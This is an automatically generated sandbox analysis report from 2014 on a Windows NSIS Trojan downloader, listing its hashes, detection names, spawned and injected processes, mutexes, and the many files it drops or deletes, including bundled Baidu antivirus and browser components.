Trojan.NSIS.StartPage_a0b7a72292

by malwarelabrobot on June 30th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.hapt (Kaspersky), Dropped:Trojan.Generic.11320244 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a0b7a7229270b045ed33322da028d711
SHA1: 1d4894593b616abda0ce8c2cc005600df68d77a2
SHA256: 184c12b1e870134a201b2747bb96eca32dddedbd806accd1527f315c8cd2639d
SSDeep: 24576:9OnGfdRGmay4PjE9bUix084d2mVWca83VSQCbLL0BnqQy:9eGfjGfjkoPwx8cHbLIBnW
Size: 1195779 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Appinstallr
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

bddownloader.exe:3092
shandian.exe:1480
dudu_b_55045.exe:668
BDDownloader.exe:3960
BDDownloader.exe:3520
regsvr32.exe:1936
BDKVWsc.exe:2740
RegSvr32.exe:468
RegSvr32.exe:3168

The Trojan injects its code into the following process(es):

shandian.exe:2548
pczh_98_2.exe:3228
%original file name%.exe:2644
sdad.exe:304
F30241_s_0523.exe:544
ionrkf_70688.exe:280

Mutexes

The following mutexes were created/opened:

ShimCacheMutex
!IETld!Mutex
ZonesLockedCacheCounterMutex
ZoneAttributeCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
WininetConnectionMutex
WininetProxyRegistryMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
SMAPLE_MUTEX
CTF.TimListCache.FMPDefaultS-1-5-21-796845957-1563985344-1801674531-1003MUTEX.DefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.TMD.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003

File activity

The process shandian.exe:1480 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF34A5.tmp (0 bytes)

The process shandian.exe:2548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\shandian\bin\twcache.ini (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\123_sogou_com[1].txt (15456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\newioage[1].css (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\welcome_cn[1].htm (1469 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)

The Trojan deletes the following file(s):

%Program Files%\shandian\bin\shandian.ini (0 bytes)

The process pczh_98_2.exe:3228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvBE.tmp (21176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif (911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskBD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif (0 bytes)

The process %original file name%.exe:2644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Program Files%\shandian\bin\shandian.ini (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (2 bytes)
%Program Files%\shandian\bin\shandian.exe (28283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\System.dll (11 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ionrkf_70688[1].rar (9606 bytes)
%Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (505 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\pczh_98_2[2].rar (1717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\dudu_b_55045.exe (31790 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\F30241_s_0523[1].rar (91814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\bind.dll (1989 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÉÁµçä¯ÀÀÆ÷.lnk (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe (91814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\config0.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\-8853_1_mvy.exe (3363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\config.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\pczh_98_2.exe (1717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\-8853_1_mvy[2].rar (12289 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dudu_b_55045[2].rar (31790 bytes)
%Program Files%\shandian\bin\sdad.exe (12955 bytes)
%Program Files%\shandian\shandian.exe (3124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe (9606 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØÉÁµçä¯ÀÀÆ÷.lnk (507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\360°²È«ä¯ÀÀÆ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\Md5dll.dll (8 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\F30241_s_0523[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\pczh_98_2[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dudu_b_55045[2].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\-8853_1_mvy[2].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\F30241_s_0523[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dudu_b_55045[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\ionrkf_70688[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ionrkf_70688[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\pczh_98_2[2].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\-8853_1_mvy[1].rar (0 bytes)

The process sdad.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\cpc_img[1].htm (442 bytes)
%Documents and Settings%\%current user%\Cookies\YWNRAD2W.txt (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\miniindex[1].htm (3687 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Cookies\FQ5A68D9.txt (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\stylemini[1].css (4968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\jquery-1.7.2.min[1].js (47317 bytes)

The process dudu_b_55045.exe:668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\TailorHeadImageLayer.ini (1 bytes)
C:\DuDu\skinConfig\ĬÈÏ\Login_Layer.ini (1 bytes)
C:\DuDu\Appsoftconfig\image\soft.xml (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\WebPage.ini (594 bytes)
C:\DuDu\Appsoftconfig\image\ielogo.png (196 bytes)
C:\DuDu\MSGBoxSkin\UI\no_button.png (1 bytes)
C:\DuDu\Kpclick.ini (48 bytes)
C:\DuDu\Appsoftconfig\image\play.png (196 bytes)
C:\DuDu\MSGBoxSkin\UI\success.png (2 bytes)
C:\DuDu\getnew.exe (1960 bytes)
C:\DuDu\BootStart.dll (549 bytes)
C:\DuDu\KPMsgBoxDll.dll (3086 bytes)
C:\DuDu\MSGBoxSkin\UI\question.png (2 bytes)
C:\DuDu\KPConfig.inf (3 bytes)
C:\DuDu\Appsoftconfig\image\cmd.png (196 bytes)
C:\DuDu\loginInfo\login.ini (216 bytes)
C:\DuDu\MSGBoxSkin\UI\ok_button.png (1 bytes)
C:\DuDu\MSGBoxSkin\UI\faild.png (2 bytes)
C:\DuDu\ExpandPackCheck.exe (1725 bytes)
C:\DuDu\MSGBoxSkin\UI\error.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\close.png (3 bytes)
C:\DuDu\skinConfig\ĬÈÏ\AboutDlgConfig\MainDlg.ini (1 bytes)
C:\DuDu\Appsoftconfig\image\coculation.png (196 bytes)
C:\DuDu\livability.dll (1921 bytes)
C:\DuDu\Kp_BootClr.exe (1529 bytes)
C:\DuDu\IndividualCenter.dll (7209 bytes)
C:\DuDu\Appsoftconfig\image\buttonplay.png (196 bytes)
C:\DuDu\MSGBoxSkin\UI\stop_button.png (1 bytes)
C:\DuDu\Dudu_Mini.exe (157 bytes)
C:\DuDu\skinConfig\ĬÈÏ\AllApplication_Layer.ini (1 bytes)
C:\DuDu\skinConfig\ĬÈÏ\AppDlgConfig\MainDlgSkin.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\LZMA.dll (68 bytes)
C:\DuDu\dgmon.dll (863 bytes)
C:\DuDu\Appsoftconfig\image\buttoncmd.png (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\MainSkin.ini (1 bytes)
C:\DuDu\skinConfig\ĬÈÏ\ImageLookDlgConfig\MainSkin.ini (130 bytes)
C:\DuDu\KpInstallTheme.exe (157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\TongJICNZZ.dll (1333 bytes)
C:\DuDu\Appsoftconfig\image\buttoncoculation.png (196 bytes)
C:\DuDu\MSGBoxSkin\UI\warning.png (3 bytes)
C:\DuDu\MSGBoxSkin\UI\yes_button.png (1 bytes)
C:\DuDu\Appsoftconfig\softtempfile\soft.xml (196 bytes)
C:\DuDu\Appsoftconfig\APPversion.ini (59 bytes)
C:\DuDu\skinConfig\skinversion.ini (29 bytes)
C:\DuDu\skinConfig\ĬÈÏ\IconsFolderNavigation_Layer.ini (1 bytes)
C:\DuDu\Appsoftconfig\button.xml (2 bytes)
C:\DuDu\MSGBoxSkin\UI\bg_top.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\bg_small.png (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\MyBaoku.ini (3 bytes)
C:\DuDu\DuDu_v1.exe (5490 bytes)
C:\DuDu\SkinCenter.dll (3635 bytes)
C:\DuDu\MSGBoxSkin\UI\delete.png (486 bytes)
C:\DuDu\MSGBoxSkin\MSGBoxSkin.ini (2 bytes)
C:\DuDu\Appsoftconfig\image\Iebuttonlogo.png (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\MainSkin.ini (3 bytes)
C:\DuDu\MSGBoxSkin\UI\cancel-button.png (1 bytes)
C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\tag.ini (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\cancel.png (3 bytes)
C:\DuDu\Repairer.exe (549 bytes)
C:\DuDu\skinConfig\ĬÈÏ\FeedbackDlgConfig\MainFeedbackDlg.ini (880 bytes)
C:\DuDu\skinConfig\ĬÈÏ\BootScreenNavigation_Layer.ini (2 bytes)
C:\DuDu\skinConfig\ĬÈÏ\HomePageShow_Layer.ini (3 bytes)
C:\DuDu\skinConfig\ĬÈÏ\LocalManagement_Layer.ini (1 bytes)
C:\DuDu\skinConfig\ĬÈÏ\DesktopWallpaperNavigation_Layer.ini (196 bytes)
C:\DuDu\MSGBoxSkin\UI\retry_button.png (1 bytes)
C:\DuDu\skinConfig\skinconfig.ini (84 bytes)
C:\DuDu\MSGBoxSkin\UI\infomation.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\MsgBox_1.ini (729 bytes)
C:\DuDu\Appsoftconfig\image\sou.png (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\cheakskin\MainSkin.ini (1 bytes)
C:\DuDu\skinConfig\SkinSetting.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\installedSoftInfo.ini (2 bytes)
C:\DuDu\Appsoftconfig\image\buttonclear.png (196 bytes)
C:\DuDu\skinConfig\ĬÈÏ\LocTween_Layer.ini (1 bytes)
C:\DuDu\Appsoftconfig\image\buttonsou.png (196 bytes)
C:\DuDu\DeskTopPop.exe (1529 bytes)
C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\UploadImageLayer.ini (3 bytes)
C:\DuDu\Appsoftconfig\image\clear.png (3 bytes)
C:\DuDu\skinConfig\ĬÈÏ\DownloadWebImageDlg\MainSkin.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\btn_known.png (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\installedSoftInfo.ini (0 bytes)

The process F30241_s_0523.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB8.tmp (34640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\NewPih.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\FileMon.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DriverManager.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (6360 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDCooly.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdRepair.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CompatibilityChecker.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVCached.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVMainFrame.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskB5.tmp (898351 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\bduf.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDPerflog.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ieBaiduSDDetectPlug.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVMainFrame.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\BDMSkin.dll (37025 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (5064 bytes)
%WinDir%\Fonts (864 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMReport.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVEng.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDLogicUtils.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKitUtils.dll (1856 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\KavUpdate.dll (1281 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\卸载百度杀毒.lnk (944 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BSRLib.dat (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe (10815 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray.rdb (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMLog.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepBase.dll (27704 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\KVInstallHelper.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMFrameWork.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\901.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (132004 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\All Users\Desktop\百度杀毒.lnk (959 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\wverify.dat (66168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPerfMon.dll (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\blacksign.dat (852 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (9605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSREng.dll (9608 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownloader.exe (42222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdSvc.exe (15536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdvs.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\hips.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bduf.dll (11048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDPerflog.dll (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDCooly.dll (44 bytes)
%WinDir% (480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrustAndIso.dll (8184 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVLogs.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\CompatibilityChecker.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrayPluginContainerConfig.xml (945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\810.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ad.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\updlog.dll (15 bytes)
